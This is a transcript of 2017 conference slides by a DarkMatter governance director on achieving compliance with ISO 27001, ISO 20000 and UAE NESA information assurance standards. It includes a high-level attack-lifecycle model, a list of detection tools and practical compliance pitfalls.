achieving compliance with iso 27001, welcome! · • installation: malware weapon installs access...
TRANSCRIPT
Welcome!Achieving Compliance with ISO 27001,
20000, and UAE IA Standards
José Luis Carrera Jr., CFE, CIA, CRMA
Director of Governance, Risk, and Compliance
DarkMatter LLC
2017 ACFE FRAUD CONFERENCE MIDDLE EAST
THE PALM
DUBAI 29-31 JANUARY 2017
ACHIEVING COMPLIANCE WITH ISO 27001, 20000 AND UAE IA STANDARDS, BUT AVOIDING THE SPEED BUMPS
CONTENTS
01 INTRODUCTION
02 WHO IS DARKMATTER?
03 STANDARDS (ISO 27001, UAE IA, ADSIC)
04 SPEED BUMPS
05 REFERENCES
06 QUESTIONS AND THANK YOU
• This discussion is intended for educational purposes only and does not replace independent
professional judgement in sizing information security governance, risk, and strategy
activities for any given organization. Statements of fact and opinions expressed are those of
the presenter and not DarkMatter LLC AE.
DISCLAIMER
01INTRODUCTION
• Director; Governance, Risk and Compliance
• Wells Fargo; Compliance Consultant, Technology and Operations
• Cricket Communication; Director of Internal Audit
• EY Bahrain; Executive Director, Risk and Advisory Services
• Agility Defense & Government Services, Chief Audit Executive
• PricewaterhouseCoopers, Senior Manager
• Saudi Aramco, Fraud Division and IT Audit Division
• Arizona State University: • Master of Business Administration: International Business and Decision Support Systems
• Arizona State University: • Bachelor of Science: Accounting and Computer Information System
JOSE LUIS CARRERA JR
02WHO IS DARKMATTER
A TRUSTED PARTNER WITHGLOBAL EXPERTISE TO PROVIDE THE ENTIRE SPECTRUM OF CYBERSECURITY SOLUTIONS
ATTACKS ARE GETTING INCREASINGLY COMPLEX AND DAMAGING
GOVERNMENTS AND ENTERPRISES ARE NOT READY TO HANDLE CYBER THREATS
NEARLY TWO-THIRDS OF
ORGANISATIONS DO NOT HAVE WELL-
DEFINED AND AUTOMATED IDENTITY
& ACCESS MANAGEMENT PROGRAMS
37%SAY THAT REAL
TIME INSIGHT ON
CYBER RISK IS
NOT AVAILABLE
“HIGHLY UNLIKELY” THAT
THEIR ORGANISATION
COULD DETECT A
SOPHISTICATED ATTACK
56%OF RESPONDENTS SAY
IT IS “UNLIKELY” OR
42%OF ORGANISATIONS
DO NOT HAVE A
SECURITY
OPERATIONS CENTRE
35–45%OF RESPONDENTS
RATED THEMSELVES
“STILL A LOT
TO IMPROVE””
43%OF ORGANISATIONS’
TOTAL INFORMATION
SECURITY BUDGET
WILL STAY THE SAME
IN THE COMING
12 MONTHS42%
HIGHLY
UNLIKELY
53%OF ORGANISATIONS SAY THATLACK OF SKILLED RESOURCES IS
ONE OF THE MAIN OBSTACLES THAT
CHALLENGE THEIR INFORMATION
SECURITY
WHO WE ARE
UAEHeadquartered
The world’s elite cyber
security talent
Trusted to protect the
nation
Offering the complete
portfolio of cyber security
solutions
Driving & developing
the next generation
cyber solutions
WE HAVE GATHERED THE WORLD’S BESTTALENT…
Harshul JoshiSenior Vice PresidentCyber Governance, Risk &Compliance
Stephen BrennanSenior Vice PresidentCyber Network Defence
Eric EifertSenior Vice PresidentManaged Security Services
Rabih DabboussiSenior Vice President Sales, Marketing & Business Development
Faisal Al BannaiChief Executive Officer
Samer KhalifeChief Financial Officer and Executive Vice President, Business Services
…TO ADDRESS THE MOST ADVANCED CYBER THREATS
GOVERNANCE, RISK &COMPLIANCE
CYBER NETWORK DEFENCE
MANAGED SECURITY SERVICES
SECURE COMMUNICATIONS
INFRASTRUCTURE & SYSTEM INTEGRATION
SMARTSOLUTIONS
PUBLIC KEY INFRASTRUCTURE
PRODUCTS
SOLUTIONS
SERVICES
DARKMATTER CAN SUPPORT COMPLEX NATIONAL CYBER INITIATIVES
Government Secure
Communications
Elite Cyber Academy
Superior Cyber SecurityCentre
Public Key Infrastructure
Smart City Cyber Security
National Crypto Suite
DarkMatter Research Stands at the Forefront of Cyber Security Innovation as Firm Aims to Secure the
Technologies of the Future
DarkMatter, the international Cyber Security firm headquartered in the UAE, has inaugurated its
research and development programme with the signing of a series of agreements with notable top tier
institutions around the world, and the engagement of PhD-level researchers who have been given
ample opportunities to innovate within the organization.
Source: Zawya, 18th of January 2017.Appeared also in: Al Watan Online, Al Watan Print, Al Bayan Online, Al Bayan Print, Middle East Projects, CPI Financial, Emirates News Gazette, Emirates Press Release, Yahoo, Street Insider, Emirates News Wire, Press Arabia, Qatar Press and Dot Emirates.
Global Ties for Cyber Security
The necessity of strong Cyber Security measures is self-evident from the rising number
of Cyber-Attacks. Digital security firm Gemalto estimates that over 700 million data
records were compromised in 2015. Yahoo disclosed in December 2016 that over one
billion email accounts were hacked in 2013, compromising sensitive user information. A
proliferation of Cyber-Attacks is causing increasing damage to companies, governments
and individuals.
Source: Oman Tribune, 26 of January 2017.
How Will Cyber Security Earnings Stack Up?
“Cyber Security really was not a focus for companies before 2015, we are now seeing a
greater push for security and compliance. Now that we are reading more about IOT
(Internet of Things) being compromised, companies are becoming more aware of
security,” said Jason Ford, chief technology officer of BlackMesh, a Cyber Security and
compliance hosting company.
Source: Yahoo, 25th of January 2017.
03STANDARDS (ISO 27001, UAE IA, ADSIC)
STANDARDS
SPEED BUMPS
MITIGATION
SUCCESS!
ISO 27001
5 Key MENA Region Digital Banking Trends in 2017
On the back of increasing Cyber Attacks and breaches in international and regional
financial institutions, Cyber Security will, for the first time in the MENA region, emerge
as one of the top priorities for CEOs and Boards of Directors. Financial institutions that
are ahead of the curve and effectively embed Cyber Security into their risk frameworks
will invest significantly in building the right capabilities and governance structures.
These, in turn, will equip them to preemptively address incidents that could potentially
damage their operations as well as reputation.
Source: Wealth Monitor, 25th of January 2017
ISO 27001 standard was published in October 2005, essentially replacing the old BS7799-2
standard. ISO 27001 (formally known as ISO/IEC 27001:2005) is a specification for an
information security management system (ISMS). An ISMS is a framework of policies and
procedures that include all legal, physical, and technical controls involved in an organization's
information-risk-management processes.
• PDCA, Plan-Do-Check-Act model to structure the processes
• :2013, places more emphasis on measuring and evaluating how well an organization's ISMS
is performing.
ISO 27001:2013
• What three (3) things make up Information Security:
AFTER LUNCH QUESTION
Technology and Processes are as good as the People who use them.
Processes
Technology
People
• What is the weakest LINK in your organizations Information Security Management?
AFTER LUNCH QUESTION
YOUR RESOURCES ARE THE WEAKEST LINK IN INFORMATION SECURITY
ISO 27001:2013 RECERTIFICATION - DOMAINS
ISO RECERTIFICATION
• Findings & recommendations
• Mitigation plan
ISO Recertification
• RA update• SOA update• Risk treatment plan
• Information security training & awareness
Internal Audit
Risk Assessment
IS Awareness
• ISMS governance framework• Management review meetings• ISMS framework, methodology, & strategy• Incident management • Effectiveness of controls & KPIs• Documents & records• Physical security• Document handling, including classification, labelling, storing, distribution,
dissemination
• Asset register• Threats & vulnerability• Applicable controls
• Information security guidelines• Best practices• Do’s & dont’s
RECERTIFICATION - DOMAINS
• Gap analysis • State of applicable
controls
• Findings & recommendations
• Mitigation plan
• Identify applicable NESA controls
• Map to standards. ISO controls
• Phased multi-year roadmap
• Support implementation
ISO Recertification
Gap Assessment & Control
Assessment
• RA update• SOA update• Risk treatment plan
• Information security training & awareness
Roadmap Definition & Control
implementation
Applicability Analysis
Internal Audit Risk Assessment IS Awareness
WE HAVE ISMS (PPS) TEMPLATES!
• Acceptable Usage of Information Assets
• Access Control
• Backup
• Business Continuity
• Communication & Operations Management
• Compliance
• Disaster Recovery Business Resumption
• Desktops & Peripherals
• Email & Internet
• Information Exchange
• Information Labelling & Handling
WE HAVE ISMS (PPS) TEMPLATES!
• Information Security Management System
• Mobile Computing
• Non Disclosure Agreements
• Network & Systems
• Personnel Security
• Physical & Environmental Security
• Privacy Policy
• System Development & Maintenance
• User Privilege
• VIP Data Protection
• VIP Logical Access
UAE INFORMATION ASSURANCE STANDARDS
NESA, The National Electronic Security Authority, is a government body tasked with protecting
the UAE’s critical information infrastructure and improving national cybersecurity. To achieve
this, NESA have produced a set of standards and guidance for government entities in critical
sectors. Compliance with these standards is mandatory.
NESA IA STANDARDS
NESA IA STANDARDS
There are 188 controls: 60 are management controls and 128 are technical controls. 35 of the management controls are “always applicable,” none of the technical controls are “always applicable.”
NESA IA CONTROLS OVERVIEW
Communications
Strategy and Planning
Risk Management
AwarenessHuman Resources
Compliance Performance
Asset Management
Physical Sec. Operations
Access Control Third Parties
AcquisitionIncidents
ManagementContinuity
MANAGEMENT CONTROLS
TECHNICAL CONTROLS
NESA IA
NESA IA 15 SECURITY DOMAINS
ENTITY
Data Management
Third Party Security
Physical Security
Security Operations
Security Governance
Risk ManagementStrategy and
Planning
Third Parties
Physical Sec.
Awareness
Compliance Performance
Human Resources
Acquisition
Communications
Access Control
Operations
Asset Management
Continuity
REALITIES OF MODERN THREATS
• Probe (Reconnaissance)
• Weaponization
• Delivery
• Exploitation
• Installation
• C & D
• Action
• Reaction
CARRERA “KILL” SEQUENCE
• Probe & (Reconnaissance)
• Bad guys Goals
–Find target
–Develop plan of attack based on opportunities for exploit
• Weaponization
• Delivery
• Bad guys Goals
–Place delivery mechanism online
–Use social engineering to induce target to access malware or other exploit
CARRERA “KILL” SEQUENCE
• Exploitation & Installation
• Bad guys Goals
–Exploit vulnerabilities on target systems to acquire access
–Elevate user privileges and install persistence payload
• Command & Control
• Bad guys Goals
–Ex-filtrate high-value data as quietly and quickly as possible
–Use compromised system to gain additional access, “steal” computing resources, and/or use in an
attack against someone else
• Action
• Reation
CARRERA “KILL” SEQUENCE
• Probe (Reconnaissance): Intruder selects target, researches it, and attempts to identify vulnerabilities
in the target network.
• Weaponization: Intruder creates remote access malware weapon, such as a virus or worm, tailored to
one or more vulnerabilities.
• Delivery: Intruder transmits weapon to target (e.g., via e-mail attachments, websites or USB drives)
• Exploitation: Malware weapon's program code triggers, which takes action on target network to exploit
vulnerability.
• Installation: Malware weapon installs access point (e.g., "backdoor") usable by intruder.
• Command and Control: Malware enables intruder to have "hands on the keyboard" persistent access to
target network.
• Actions/Reaction: Intruder takes action to achieve their goals, such as data exfiltration, data
destruction, or encryption for ransom.
CARRERA “KILL” SEQUENCE
KILL SEQUENCE MAPPING
• Identify
• Prepare
• Detect
• Respond
• Recover
CARRERAISM RAPID DETECTION MODEL
• COMMON THREAT DETECTION METHODS:
• Traditional tools
• Machine-Readable Threat Intelligence
• Shared INDICATORS 0F COMPPROMISE (IOCs)
– Open IOC
• Find the Evil
– IOCbucket.com
• njrat
• Applying Threat Intelligence
DETECT
• COMMON THREAT DETECTION METHODS:
• Next-generation threat detection (behavioral)
• Cb
– Bad guys often repeat behavioral patterns, such as:
• Naming conventions
• Working directories used to copy files
• Methods of using built-in system commands and utilities
• Security analytics
• Service providers
DETECT
• Validate
• To triage an alert and determine whether it is a false positive or a valid threat, analysts can:– Use leads in the alert (IP addresses, DNS hostnames, machine names)– Pivot to view related SIEM information in the SIEM– Review netflow data and live response data from the suspected endpoints
• Record the time between validation and containment and track this time across incidents as a time-to-contain metric.
• Contain
RECOVER
• Memory Analysis
• Volatility 2.4
• Redline
• Network Forensics
• Damballa
• Wireshark
RECOVER
M3 Awareness and Training
MANAGEMENT CONTROL
Control # Control Name Control Priority
M3.1.1AWARENESS AND TRAINING POLICY
The entity shall develop and maintain an awareness and training policy.
P2
M3.1.1.1The awareness and training policy shall be appropriate to the purpose of the entity.
M3.1.1.2The awareness and training policy shall provide the framework for setting awareness and training objectives.
M3.1.1.3The awareness and training policy shall facilitate the implementation of the associated controls.
M3.1.1.4The awareness and training policy shall outline the roles and responsibilities of providers and recipients of awareness and training activities.
T5 Access Control
TECHNICAL CONTROL
Control # Control Name Control Priority
T5.1 ACCESS CONTROL POLICY
T5.1.1ACCESS CONTROL POLICY
The entity shall establish an access control policy based on business and security requirements.
P2
T5.1.1.1The access control policy shall be appropriate to the purpose of the entity.
T5.1.1.2The access control policy shall include statement of the management commitment, purpose, objective and scope of the policy.
T5.1.1.3The access control policy shall outline the roles and responsibilities for granting and denying access.
T5.1.1.4The access control policy shall provide the framework for the protection of mobile devices against prevailing risks, including users owned devices.
T5 Access Control
TECHNICAL CONTROL
Control # Control Name Control Priority
T5.1 ACCESS CONTROL POLICY
T5.1.1ACCESS CONTROL POLICY
The entity shall establish an access control policy based on business and security requirements.
P2
T5.1.1.5The access control policy shall provide the framework to protect information from unauthorized access and grant access to the appropriate users and mobile devices.
T5.1.1.6The access control policy shall be documented and communicated to all users.
T5.1.1.7The access control policy shall be read and acknowledged formally by all users.
T5.1.1.8The access control policy shall be maintained, reviewed, and updated at planned intervals or if significant changes occur.
• In my opinion there are several stages to achieving and maintaining compliance to the
NESA UAE IAS:
• Risk assessment
• GAP assessment and continual audit self-assessment
• Implementation
• Training
• Annual compliance audits
SPEED BUMP AVOIDANCE
ABU DHABI SYSTEMS & INFORMATION CENTRE (ADSIC)
“To develop, drive and support the various initiatives within the Abu Dhabi Government service
transformation programme, the Abu Dhabi Systems & Information Centre (ADSIC) was created
as Committee in October 2005 by Executive Council Decree No. 33, and established as a
Centre in December 2008 by Law No. 18. The Centre is considered as the governmental party
that owns the IT agenda of the Emirate, and has the authority to practice the following
competences:
• Supervise the implementation of the e-Government program in ADGEs.
• Sponsor initiatives and mature assets and competencies that it deems of critical importance
for the e-Government project.
• Propose policies and technology standards for government and relevant entities to achieve
a comprehensive quality in reaching the highest levels of efficiency, confidentiality, and
safety in the e-Government project.”
ABU DHABI SYSTEMS & INFORMATION CENTRE
• “Propose policies and technology standards for government and relevant entities to achieve
a comprehensive quality in reaching the highest levels of efficiency, confidentiality, and
safety in the e-Government project.
• Issue rules and guidelines regarding the implementation of IT policies and the technical
specifications, and communicate them to all the Government entities.
• Submit the guidelines to the Council regarding the IT sector and the e-Government.
• The mandate translates into the mission of government modernization at large:
• Performance improvement
• Process simplification
• Use of IT”
ADSIC
ADSIC
• Regional
• Leverage standards
• “One piece of evidence, can work for two standards”
• Pssst….39 P1 NESA IA Controls
ADSIC
ISO 20000
ISO/IEC 20000 is a global standard that describes the requirements for an information
technology service management (ITSM) system. The standard was developed to mirror the
best practices described within the IT Infrastructure Library (ITIL) framework.
• ISO/IEC 20000 adopts a PDCA (Plan, Do, Check, Act) Deming lifecycle, similar to other
ISO norms. This can also be observed parallel to a 7-Step CSI improvement process in ITIL
CSI. Processes are organized into groups: Service Delivery, Relationship, Resolution, and
Control. PDCA, Plan-Do-Check-Act model to structure the processes.
• ISO/IEC 20000 provides strict requirements (WHAT) and a simple code of practice (HOW).
The story is further expanded by ITIL experience and best practice framework as a detailed
guidance about processes and functions. At the base are basic in-house procedures and
work instructions, from core business and other implemented standards/methodologies
(ISO, PMI…).
ISO 20000:2011
• ISO 20000 promotes the "adoption of an integrated process approach to effectively deliver
managed services to meet the business and customer requirements."
ISO 20000:2011
• Critical foundation
• Risk assessment
• Organizational business services
• IT service catalogue
• Map business and IT services
• “Lone assets”
• One to many, many to one
SPEED BUMP AVOIDANCE
COMPARISON
04SPEED BUMPS
• Scope and objective
• Must be defined and agreed upon
• Mitigation of prior internal audits, risk assessments, penetration testing, and/or
vulnerability assessments
• Mitigation should be completed within 12 months, if possible
• Documentation availability and quality of documentation
• Substance versus form
SPEED BUMPS
• Cultural sensitivity
• We live in and work in a multicultural environment
• Service-level and operation-level agreements
• Service-level agreements: key performance indicators• Operation-level agreements: Are “they” meeting expectation?
• “Lost in Translation”
• Frequency of control versus “we’ve done it”
• Evidence, evidence, evidence
SPEED BUMPS
05REFERENCES
• www.darkmatter.ae
• http://www.iso.org/iso/home.html
• https://adsic.abudhabi.ae/adsic/faces/en/home?_afrLoop=13103778143901525#!%40%40
%3F_afrLoop%3D13103778143901525%26_adf.ctrl-state%3D1b7dnt22c7_49
• NIST SP 800-53 Rev. 4: NIST Special Publication 800-53 Revision 4, Security and Privacy
Controls for Federal Information Systems and Organizations, April 2013 (including updates
as of January 15, 2014). http://dx.doi.org/10.6028/NIST.SP.800 53r4
• http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf
• http://www.fda.gov/MedicalDevices/DeviceRegulationandGuidance/GuidanceDocuments/uc
m077812.htm
• http://www.pwc.com/gx/en/issues/cyber-security/information-security-survey.html
REFERENCE
• Control Objectives for Information and Related Technology (COBIT):
http://www.isaca.org/COBIT/Pages/default.aspx
• Council on CyberSecurity (CCS) Top 20 Critical Security Controls (CSC):
http://www.counciloncybersecurity.org
• ANSI/ISA-62443-2-1 (99.02.01)-2009, Security for Industrial Automation and Control
Systems: Establishing an Industrial Automation and Control Systems Security Program:
http://www.isa.org/Template.cfm?Section=Standards8&Template=/Ecommerce/ProductDis
play.cfm&ProductID=10243
REFERENCE
QUESTIONS
06
THANK YOU
Welcome!Achieving Compliance with ISO 27001,
20000, and UAE IA Standards
José Luis Carrera Jr., CFE, CIA, CRMA
Director of Governance, Risk, and Compliance
DarkMatter LLC